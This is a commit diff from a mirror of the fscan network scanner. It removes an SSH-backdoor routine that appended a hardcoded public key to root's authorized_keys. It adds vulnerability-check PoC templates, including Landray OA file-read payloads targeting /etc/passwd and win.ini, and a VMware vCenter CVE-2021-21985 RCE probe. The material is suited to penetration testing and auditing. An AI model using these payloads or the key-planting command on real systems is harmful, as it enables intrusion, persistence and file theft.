mirror of https://github.com/qwqdanchun/fscan.git
更新poc
This commit is contained in:
parent
a8835a9fe4
commit
ad1c53e3f4
|
@ -74,9 +74,6 @@ func SshConn(info *common.HostInfo, user string, pass string) (flag bool, err er
|
|||
flag = true
|
||||
var result string
|
||||
if info.Command != "" {
|
||||
if info.Command == "shadow" {
|
||||
info.Command = "mkdir dir /root/.ssh/ && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDkQQuWtmLm0eEhogGubMFh2/qv21aQV1tzbRjySPNQJRig479hMre48jxWDzB71WdEU2vg+ns8/0s3jqcGAx5lJaneH1ovLRNdIq4PkfmJPSMCEibGoNVS47rvfrv4QgECnbAt3azklnvniDvZiP5KjBQS9z57Ni2WVDC1SHNy1PDVMGYMJxZZ8kVKP7LRDbiOKJsSplHV/qP3NGZkdKh7OUYBx8A7+S3vT9c3AMSmk74Z2ibU0sddlngf0hLOxbTRiJV+OsgQQOfnttZvA7LoxbCiMtpzKGLOLAHXD8Hx5okXkx8cGOjc+Fcr6s2eQ10BLGPO4LPYWQ+G91xj+VF7 sysadmin\">> /root/.ssh/authorized_keys"
|
||||
}
|
||||
combo, _ := session.CombinedOutput(info.Command)
|
||||
result = fmt.Sprintf("[+] SSH:%v:%v:%v %v \n %v", Host, Port, Username, Password, string(combo))
|
||||
if info.SshKey != "" {
|
||||
|
|
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
|
@ -0,0 +1,11 @@
|
|||
name: poc-yaml-landray-oa-custom-jsp-fileread
|
||||
rules:
|
||||
- method: POST
|
||||
path: /sys/ui/extend/varkind/custom.jsp
|
||||
body: var={"body":{"file":"file:///c://windows/win.ini"}}
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"for 16-bit app support")
|
||||
detail:
|
||||
author: B1anda0(https://github.com/B1anda0)
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
|
|
@ -0,0 +1,11 @@
|
|||
name: poc-yaml-landray-oa-custom-jsp-fileread
|
||||
rules:
|
||||
- method: POST
|
||||
path: /sys/ui/extend/varkind/custom.jsp
|
||||
body: var={"body":{"file":"file:///etc/passwd"}}
|
||||
expression: |
|
||||
response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
|
||||
detail:
|
||||
author: B1anda0(https://github.com/B1anda0)
|
||||
links:
|
||||
- https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
|
|
@ -0,0 +1,17 @@
|
|||
name: poc-yaml-vmware-vcenter-cve-2021-21985-rce
|
||||
rules:
|
||||
- method: POST
|
||||
path: /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData
|
||||
headers:
|
||||
Content-Type: application/json
|
||||
body: |-
|
||||
{"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]}\x0d\x0a
|
||||
expression: |
|
||||
response.status == 200 && response.body.bcontains(b"result")
|
||||
detail:
|
||||
vulnpath: "/ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData"
|
||||
author: envone77
|
||||
description: "vmware vCenter unauth RCE cve-2021-21985"
|
||||
links:
|
||||
- https://www.anquanke.com/post/id/243098
|
||||
- https://github.com/alt3kx/CVE-2021-21985_PoC
|
|
@ -11,7 +11,7 @@ func Banner() {
|
|||
/ /_\/____/ __|/ __| '__/ _` + "`" + ` |/ __| |/ /
|
||||
/ /_\\_____\__ \ (__| | | (_| | (__| <
|
||||
\____/ |___/\___|_| \__,_|\___|_|\_\
|
||||
fscan version: 1.6.2
|
||||
fscan version: 1.6.3
|
||||
`
|
||||
print(banner)
|
||||
}
|
||||
|
|
Loading…
Reference in New Issue